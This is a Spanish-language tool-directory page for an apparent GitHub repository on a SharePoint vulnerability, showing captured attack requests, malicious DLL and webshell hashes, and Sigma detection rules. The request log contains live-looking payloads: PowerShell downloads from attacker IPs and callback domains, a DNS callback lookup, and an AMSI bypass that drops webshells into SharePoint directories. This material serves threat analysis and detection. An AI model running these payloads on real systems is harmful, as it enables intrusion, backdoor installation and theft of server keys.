Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-50522 — Microsoft SharePoint CVE-2026-50522 | Kitploit
Herramientas/GitHubGitHub/darses/cve-2026-50522
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubdarses/cve-2026-50522

CVE-2026-50522

Microsoft SharePoint CVE-2026-50522

Ver Repositorio
hace 20 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-50522

Microsoft SharePoint CVE-2026-50522 cargas útiles y análisis.

Peticiones HTTP

requestsrcuser-agentencodingunique idpayload
81697888245.63.58.216Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'urn:unique-id:securitycontext:b764f8e60e90450b8629b5ce74fccf82powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://45.63.58.216:80/b764f8e60e90450b8629b5ce74fccf82'
818198798146.19.216.119Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.26100.33158'urn:unique-id:securitycontext:2965f1ebb795466c82f01142ca764efaMain.dll
819557248Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"urn:unique-id:securitycontext:8e1a54521f004b19880a4823bcdd3a94ayhmu2nq.dll
819736316165.154.199.52Mozilla/5.0'urn:uid:f7e4a5a8041648ef88f4befd099b1c61eze1fcmh.dll
82202661089.117.94.35Python-urllib/3.12"urn:unique-id:securitycontext:77b2293ba0f5464db990f3d2ae402698ActivitySurrogateDisableTypeCheck
82202661689.117.94.35Python-urllib/3.12"urn:unique-id:securitycontext:401e5797f3864092a836f92976a6506fedm3ysnc.dll
822486322199.91.221.39Mozilla/5.0 (compatible; SPOOB/1.0)"urn:unique-id:securitycontext:0e5062c6139e48e3bd951e88b3165a48opctzxj4.dll

Cargas útiles

Webshells

Detecciones

Las detecciones no se verificaron con registros reales.

Descargar herramienta
822730890
199.91.221.39
Mozilla/5.0 (compatible; SPMKScan/1.1)
"
urn:unique-id:securitycontext:64ca3f7733c04b8cbcd859e1c08ebb54
ko5ybodq.dll
823155656175.137.255.204Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"urn:unique-id:securitycontext:6ae69a0ebb7c4b66b7e8cc6f232a7ce3powershell.exe -NoProfile -NonInteractive -Command Invoke-WebRequest -UseBasicParsing 'http://d9k41hj3d47lhf7hbhlg6enhdi7tqb3uk.oast.me/206.255.76.17'
823277752103.151.172.73Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"urn:unique-id:securitycontext:ed252fcd4481466d9f70d3a693a9d073nslookup 9ac2293c.log.dnslog.pp.ua
82345241438.175.103.78Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0"urn:unique-id:securitycontext:50fe1b81594845f293362037b3b4b32d`powershell.exe -NoProfile -NonInteractive -Command $ErrorActionPreference='SilentlyContinue';$a=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');if($a){$f=$a.GetField('amsiInitFailed','NonPublic,Static');if($f){$f.SetValue($null,$true)}};$c=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('[SNIP ERROR.aspx webshell'));$dirs=@('C:\inetpub\wwwroot\wss\VirtualDirectories','C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS','C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS');foreach($d in $dirs){if(Test-Path $d){Get-ChildItem $d -Recurse -Directory -ErrorAction SilentlyContinue
824307296190.5.224.135Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"urn:unique-id:securitycontext:0584ba10642c43e2850bff4122a81514powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand JABFAHIAcgBv[SNIP], `$ErrorActionPreference='SilentlyContinue';$ProgressPreference='SilentlyContinue';$webshellB64='[SNIP default_settings.aspx webshell]';$msg='NOPATH';$done=$false;@('16','15')
file namefile hash SHA-256creation time (UTC)notes
14e2gtsh.dll8bd04f0213c39f07c4baa283375017463e20642545a6fefcbcb6d792c7ee6d9d2026-07-24 03:00:13Devuelve MachineKeys
ayhmu2nq.dlledb087336f22a152d9023416b60ee74db2d30e5df52f2166f5dd1b4ae70aa2eb2026-07-24 01:47:55Habilita WinRM con CompatibilityHttpsListener, añade el usuario sp_admin y lo añade al grupo local de administradores
b4tg4ktk.dll824052c860945c1bda536f20318429240319f4f59bc4cf8740a0d6bffe2b99662026-07-23 07:53:59Devuelve MachineKeys y el código de estado 200
bwd0vdqa.dllafce3e097f06e1c5e4dd3422dd7ebc6615a94b111a8b7ab5333071fbb1ecbb352026-07-23 02:54:54Devuelve MachineKeys
edm3ysnc.dll91d18bcd4532c7f64a220ca65971e2a41d435148e4ac9811bfc33d2a8fb705492026-07-22 10:54:43Devuelve MachineKeys
eze1fcmh.dll02fe5d24867227cb4bff7d3f019d804a19158e3de1de0729fdd067aae55b0bbd2026-07-24 02:37:59Escribe webshell/backdoor cmRANDOM.aspx
hyyavam5.dll74c205b86a8c0884d968225e20db2624164021df14987bc7f602a9ed45ed6c8f2026-07-26 03:20:01
jflyahz3.dll352e47e996a1b43250a4462fa259e12b1fee726abe1be42f1806b30be94591512026-07-23 07:15:43Devuelve MachineKeys
ko5ybodq.dll249fea110682ff603bf24f9c1147eae73642b186c7a23022d5f824498b8fcd662026-07-27 14:41:06
Main.dll7baf220eb89f2a216fcb2d0e9aa021b2a10324f0641caf8b7a9088e4e45bec952055-02-11 11:16:12Devuelve MachineKeys. Carga útil utilizada anteriormente durante la campaña ToolShell.
obdw11tn.dll2ed05c2ff5977047a5aa779510983f7f27b1fde8a0ce6ac8611341eea55f9e372025-07-29 08:50:39Devuelve MachineKeys
opctzxj4.dllf5c8c39b29d061d72eaefcf1ff19511bdab5d4b3c9849df4ead07dbe61364ee22026-07-27 15:32:46
tyt0qmyy.dll46e5aedd0e699bf0a3ad8f8cd67d79b51d65ce77e02ff96a49617d5c8c3fe4d72026-07-20 08:55:23Devuelve la cabecera de respuesta HTTP sec-ch-ua-mobile: ?1
z1zkfu55.dllab2e01650b20787dd940475041f83f19c4e025988fcf8aab443ca607003da0122026-07-26 04:49:55
gzlzbkhj.dll52f4af0401258daa9a278710145a9d0d67a35147f0ea136b88684362953489332026-07-25 14:08:17
qho14tqo.dll814db355b4a03fbd6fa138b37a04dd5ff24d9bc5d15e24474f149b220e9c60782026-07-23 06:58:36
file namefile hash SHA-256notes
cmRANDOM.aspx450839ecab9cb5595b4f6088e7b16d7ea3a5289f2afcc7ae89c041ae046e2511Webshell "Helper Tool" y nombre de archivo cm{RANDOM}.aspx. Las cargas útiles se ejecutan en memoria mediante Assembly.Load(assemblyBytes). El nombre de archivo se genera aleatoriamente.
default_settings.aspxf72a4d95b4c49bb9ffac869d2a30d829f2519d2f6a1a86bcea54dbeffc34f550Ubicación de la webshell TEMPLATE\LAYOUTS o \wss\VirtualDirectories\
error.aspx291dc1f15143c2c87fd2257b6145069914bdffa2f6be9afa63169f8661d9cc4bUbicación de la webshell C:\inetpub\wwwroot\wss\VirtualDirectories, C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS, C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS.
layout2sp.aspxd7ba3ef04a5809d6c672a13bbd7d6a3fc6317faeefbae98bec437ade0475a597Ubicación de la webshell \TEMPLATE\LAYOUTS\layout2sp.aspx.
typerulenotes
SigmaConsulta DNS a dominios de interacción con servicios externosDetecta consultas DNS salientes hacia los dominios de callback como .log.dnslog.pp.ua, .oast.me, .oastify.com.
SigmaNuevo usuario creado mediante Net.EXEDetecta nuevos usuarios agregados mediante net.exe.
SigmaPosible movimiento lateral por WMI: WmiPrvSE inicia PowerShellDetecta movimiento lateral a través de WMI.
SigmaEscritura de archivo sospechosa en el directorio Layouts de SharePointDetecta escrituras de archivos en la carpeta de SharePoint \TEMPLATE\LAYOUTS\.
SigmaProceso padre de PowerShell sospechosoDetecta la creación del proceso powershell.exe por parte de w3wp.exe.
SigmaProceso sospechoso creado por el proceso del servidor webDetecta procesos sospechosos creados por w3wp.exe.
SigmaProcesos sospechosos iniciados por WinRMDetecta procesos sospechosos, incluidos shells creados desde el proceso host de WinRM.
SigmaDetección de webshells con palabras clave de línea de comandosDetecta ciertos parámetros de línea de comandos utilizados a menudo durante actividades de reconocimiento a través de webshells.
SigmaPatrones de actividad de hacking mediante webshellsDetecta ciertos procesos hijo de w3wp.exe